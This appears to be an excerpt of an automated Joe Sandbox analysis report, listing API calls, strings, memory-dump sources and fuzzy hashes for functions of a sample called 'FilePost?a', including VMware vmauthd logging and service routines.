                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0BF
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0F5
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6CF969D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_free$InfoLocale
                                                    • String ID: utf8
                                                    • API String ID: 2003897158-905460609
                                                    • Opcode ID: 8ee1355a6eb645df94dd68c82402b85868d60325a54b82d6835f94fe6f7c076c
                                                    • Instruction ID: cbe7efa0c3dd0ea281712245b567bd7cf64f6cebb8b041f9e06cd0192315fe24
                                                    • Opcode Fuzzy Hash: 8ee1355a6eb645df94dd68c82402b85868d60325a54b82d6835f94fe6f7c076c
                                                    • Instruction Fuzzy Hash: B0F02832B15105ABDB249B34CD45EFA33BCDB45314F01027AF502E7680EB74AD088794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                    • EnumSystemLocalesW.KERNEL32(6CF96DEB,00000001,?,?,-00000050,?,6CF9718A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6CF96B57
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: 966c2e47a70e37bde68916b2ecf201c347f0596e044617fa348590bae9192af5
                                                    • Instruction ID: fef984e84e1601a176d37009dfb472b61cbe42327474624f7829c7e549c4ea53
                                                    • Opcode Fuzzy Hash: 966c2e47a70e37bde68916b2ecf201c347f0596e044617fa348590bae9192af5
                                                    • Instruction Fuzzy Hash: 1DF0C2366043045FEB145F35CC80A6A7BA1EB8276CF15452DF9468BA90D672A842C694
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF876E2: EnterCriticalSection.KERNEL32(?,?,6CF88FB7,?,6CFB7058,00000008,6CF89130,00000001,?,?), ref: 6CF876F1
                                                    • EnumSystemLocalesW.KERNEL32(6CF8EF2D,00000001,6CFB7278,0000000C,6CF8F2FB,00000000), ref: 6CF8EF72
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                    • String ID:
                                                    • API String ID: 1272433827-0
                                                    • Opcode ID: 93ac1bad6fb446b1e798678ac38553d73676b037d3bcebe0987f7b9d197355b6
                                                    • Instruction ID: 39eeb977bb9c902e1c8323f5871b21fee8863824ec1ef927838f68150d2aa181
                                                    • Opcode Fuzzy Hash: 93ac1bad6fb446b1e798678ac38553d73676b037d3bcebe0987f7b9d197355b6
                                                    • Instruction Fuzzy Hash: 81F04976A11201DFDB00DFA8D445B9C77F0EB4A325F20455BF400EB790CB7659448F90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                    • EnumSystemLocalesW.KERNEL32(6CF96980,00000001,?,?,?,6CF971E8,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6CF96A5E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: 5f49dfac53322c97bfd1c1903c6bd23698f2f5a77a475787a1cae271046f8795
                                                    • Instruction ID: d712e9eb5e9822413dde4c96507a49b13f33f32f831427389e906fba25204b40
                                                    • Opcode Fuzzy Hash: 5f49dfac53322c97bfd1c1903c6bd23698f2f5a77a475787a1cae271046f8795
                                                    • Instruction Fuzzy Hash: 6FF0E53670420597DF08AF36C854A6ABFA4EFC2754F0A4459FA19CBA50C6329942C7D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CF61E13
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ContextCryptRelease
                                                    • String ID:
                                                    • API String ID: 829835001-0
                                                    • Opcode ID: 80aec0291cc36fa19a5b09005480caca44a8eab3df6369b9fbf7187c0cc9e249
                                                    • Instruction ID: 9856cf2a31dc832bbf7d7be66b7c25d90b905e6721956e7bcf59809ff84c71c9
                                                    • Opcode Fuzzy Hash: 80aec0291cc36fa19a5b09005480caca44a8eab3df6369b9fbf7187c0cc9e249
                                                    • Instruction Fuzzy Hash: 13D02E71B0035013E6204B18AC02BCBBAEC9F22B08F10C81EB584E6A90CBB0E440C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000090F0,00ED8B75), ref: 00ED90E8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 2705f8ca28d970ffe95477bea1fd8aa628c4027e67f160d8ed0c798ccfeaee8d
                                                    • Instruction ID: 2b0364e40a9d5fd74e631588d7a9966a6fe5205aac3f34b66bd01c5c27a8525c
                                                    • Opcode Fuzzy Hash: 2705f8ca28d970ffe95477bea1fd8aa628c4027e67f160d8ed0c798ccfeaee8d
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: bf6d162859ba607f939afde54b893d71c61dc44ef1019e334395fe6c29986289
                                                    • Instruction ID: 69c77fde557f9a1f5f446bbcde330e08629959b6bf7a17b7371cdf3654086a03
                                                    • Opcode Fuzzy Hash: bf6d162859ba607f939afde54b893d71c61dc44ef1019e334395fe6c29986289
                                                    • Instruction Fuzzy Hash: B8A02430F10101CF4FC04F31434434D37FC55033D131400147104C1110D77440404700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE ref: 00ED44F7
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED44FD
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000034), ref: 00ED4507
                                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00ED4531
                                                    • srand.API-MS-WIN-CRT-UTILITY-L1-1-0(-0000058F), ref: 00ED453D
                                                    • GetLastError.KERNEL32 ref: 00ED457E
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED4585
                                                    • CloseHandle.KERNEL32(?), ref: 00ED476B
                                                    • TerminateThread.KERNEL32(?,00000000), ref: 00ED4788
                                                    • CloseHandle.KERNEL32(?), ref: 00ED4794
                                                    • TerminateThread.KERNEL32(?,00000000), ref: 00ED47C2
                                                    • CloseHandle.KERNEL32 ref: 00ED47CE
                                                    • CloseHandle.KERNEL32(?), ref: 00ED47F1
                                                    • closesocket.WS2_32(?), ref: 00ED4806
                                                    • closesocket.WS2_32(?), ref: 00ED4815
                                                    • CloseHandle.KERNEL32(?), ref: 00ED4823
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED482A
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    Strings
                                                    • Failed to create event for process creation notification: %s (%d) , xrefs: 00ED474E
                                                    • calloc() failed., xrefs: 00ED4516
                                                    • Call to Create reaper thread failed: %s (%d) , xrefs: 00ED471C
                                                    • Failed to create event for named pipe: %s (%d) , xrefs: 00ED4613
                                                    • Failed to create event for termination notification: %s (%d) , xrefs: 00ED4735
                                                    • Failed to create event for listen socket: %s (%d) , xrefs: 00ED458B, 00ED45D1
                                                    • Call to Create service thread failed: %s (%d) , xrefs: 00ED46FA
                                                    • Failed to create event for shutdown notfication: %s (%d) , xrefs: 00ED464B
                                                    • authd.client.port, xrefs: 00ED4548
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$Warning$ErrorLast$TerminateThreadclosesocketfree$_printf_time64callocsrand
                                                    • String ID: Call to Create reaper thread failed: %s (%d) $Call to Create service thread failed: %s (%d) $Failed to create event for listen socket: %s (%d) $Failed to create event for named pipe: %s (%d) $Failed to create event for process creation notification: %s (%d) $Failed to create event for shutdown notfication: %s (%d) $Failed to create event for termination notification: %s (%d) $authd.client.port$calloc() failed.
                                                    • API String ID: 3761548739-2450155441
                                                    • Opcode ID: cc2f2cb5728c92752740c2bbdac35c5d885404f4914d3d1e57dfcf8d510e5422
                                                    • Instruction ID: b2aa4aadd9b97e642f012880c62f2571dcb8583918e707372735a6d6c6d475ad
                                                    • Opcode Fuzzy Hash: cc2f2cb5728c92752740c2bbdac35c5d885404f4914d3d1e57dfcf8d510e5422
                                                    • Instruction Fuzzy Hash: DC8123F1641301AFD7106FB1BC4AB6A77A8EB25705F142127FA15F63C1DB70EA068B62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,?,00000000,00000000,?,00ED269A), ref: 00ED2864
                                                    • Warning.VMWAREBASE(?,?,00000000,00000000,?,00ED269A), ref: 00ED2871
                                                    • Warning.VMWAREBASE(00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,00ED269A), ref: 00ED2887
                                                    • Warning.VMWAREBASE(00000000,00000003,log.syslogMinLevel,00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,00ED269A), ref: 00ED2894
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED289C
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28A3
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28A9
                                                    • Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28AF
                                                    • Warning.VMWAREBASE(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28B5
                                                    • Warning.VMWAREBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28BB
                                                    • Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00ED28C7
                                                    • Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00ED28D2
                                                    • Warning.VMWAREBASE(?,00000000,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED28E7
                                                    • Warning.VMWAREBASE(00000000,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED28F6
                                                    • Warning.VMWAREBASE(00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED2910
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED2918
                                                    • Warning.VMWAREBASE(?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED292B
                                                    • Warning.VMWAREBASE(00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2939
                                                    • Warning.VMWAREBASE(00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2949
                                                    • Warning.VMWAREBASE(00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2956
                                                    • Warning.VMWAREBASE(00000000,00000003,log.logMinLevel,00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?), ref: 00ED2963
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00ED296B
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00ED2972
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 00ED2978
                                                    • Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 00ED297E
                                                    • Warning.VMWAREBASE(00000000,00000000,00000000), ref: 00ED2984
                                                    • Warning.VMWAREBASE(00000000,00000000,00000000,00000000), ref: 00ED298A
                                                    • Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED2998
                                                    • Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED299E
                                                    • Warning.VMWAREBASE(00000000,000000FF,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED29AA
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,000000FF,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED29B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free
                                                    • String ID: %s\%s$log.fileName$log.logMinLevel$log.suffix$log.syslogID$log.syslogMinLevel$log.systemAreaTemp$vmauthd$vmauthd.log$vmauthd.log.fileName
                                                    • API String ID: 2642810717-3249989834
                                                    • Opcode ID: c589fa23bbbf17402aba5235fe9c044e8052931781ec94f6e92fdb6feffd6e50
                                                    • Instruction ID: 451637cbb4a55ac2dd49375405d112757526c8649ec2433813815527c11f755c
                                                    • Opcode Fuzzy Hash: c589fa23bbbf17402aba5235fe9c044e8052931781ec94f6e92fdb6feffd6e50
                                                    • Instruction Fuzzy Hash: 573181A0A8131471DA2037B50DDBFAF25ECCF91B55F05752BF924B6383FAA9850381B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(00ED8208,?,?,00000000,00000000,00ED8208,?,00000000), ref: 00ED7CFA
                                                    • Warning.VMWAREBASE([Ticket] Unable to open dir %s,00ED8208,00000000,00000000,00ED8208,?,00000000), ref: 00ED7D0F
                                                    • Warning.VMWAREBASE(?,00000000,00000000,00ED8208,?,00000000), ref: 00ED7D3A
                                                    • Warning.VMWAREBASE(vmtck-,?,00000000,00000000,00ED8208,?,00000000), ref: 00ED7D46
                                                    • Warning.VMWAREBASE(?,00000000,00000000,vmtck-,00000000,00000000,00000000,?,?,00000000,00000000,00ED8208,?,00000000), ref: 00ED7D69
                                                    • Warning.VMWAREBASE(00ED8208,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00ED8208,?), ref: 00ED7D83
                                                    • Warning.VMWAREBASE(00000000,00ED8208,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00ED8208), ref: 00ED7D8B
                                                    • Warning.VMWAREBASE(00000006,[Ticket] Reaping stale ticket %s,00000000), ref: 00ED7DC3
                                                    • Warning.VMWAREBASE(00000000,00000006,[Ticket] Reaping stale ticket %s,00000000), ref: 00ED7DC9
                                                    • Warning.VMWAREBASE ref: 00ED7DD8
                                                    • Warning.VMWAREBASE([Ticket] Failed to remove stale ticket %s: %s,00000000,00000000), ref: 00ED7DE4
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED7E16
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00ED8208,?,00000000), ref: 00ED7E34
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED7E53
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED7E71
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED7E85
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00ED7E8E
                                                    Strings
                                                    • [Ticket] Failed to remove stale ticket %s: %s, xrefs: 00ED7DDF
                                                    • [Ticket] Failed to stat ticket %s: %s, xrefs: 00ED7E08
                                                    • [Ticket] Unable to open dir %s, xrefs: 00ED7D0A
                                                    • [Ticket] Reaping stale ticket %s, xrefs: 00ED7DB9
                                                    • vmtck-, xrefs: 00ED7D3F, 00ED7D5B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$_errno
                                                    • String ID: [Ticket] Failed to remove stale ticket %s: %s$[Ticket] Failed to stat ticket %s: %s$[Ticket] Reaping stale ticket %s$[Ticket] Unable to open dir %s$vmtck-
                                                    • API String ID: 2549721144-1566788480
                                                    • Opcode ID: e1c70aedf5e32c5cc97507da00bdccc8f763162fecb949db39426ef158d6cf16
                                                    • Instruction ID: d8844f0b5db69a6ee20b33abc31cb9ca69003627e94d6a11cbec91c21bcb01fd
                                                    • Opcode Fuzzy Hash: e1c70aedf5e32c5cc97507da00bdccc8f763162fecb949db39426ef158d6cf16
                                                    • Instruction Fuzzy Hash: 11512670A05215AFCB10AFB8DC46ABE7BB5EF05304F0411ABFD55B3352E6319E1287A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(Service Paused.), ref: 00ED42A8
                                                    • Warning.VMWAREBASE(Service Continuing.), ref: 00ED42C4
                                                    • SetServiceStatus.ADVAPI32(00EE1040), ref: 00ED4304
                                                    • GetLastError.KERNEL32 ref: 00ED430E
                                                    • GetLastError.KERNEL32 ref: 00ED4314
                                                    • Warning.VMWAREBASE(Unknown service opcode %d,?), ref: 00ED442F
                                                    • SetServiceStatus.ADVAPI32(00EE1040), ref: 00ED4442
                                                    • GetLastError.KERNEL32 ref: 00ED444C
                                                    Strings
                                                    • SetServiceStatus failed while stopping(error %d)., xrefs: 00ED431B
                                                    • Service Continuing., xrefs: 00ED42B5
                                                    • Unknown service opcode %d, xrefs: 00ED442A
                                                    • Service being interrogated...., xrefs: 00ED441B
                                                    • Service Paused., xrefs: 00ED4299
                                                    • SetServiceStatus failed (error %d)., xrefs: 00ED4453
                                                    • Service Stopped., xrefs: 00ED4402
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
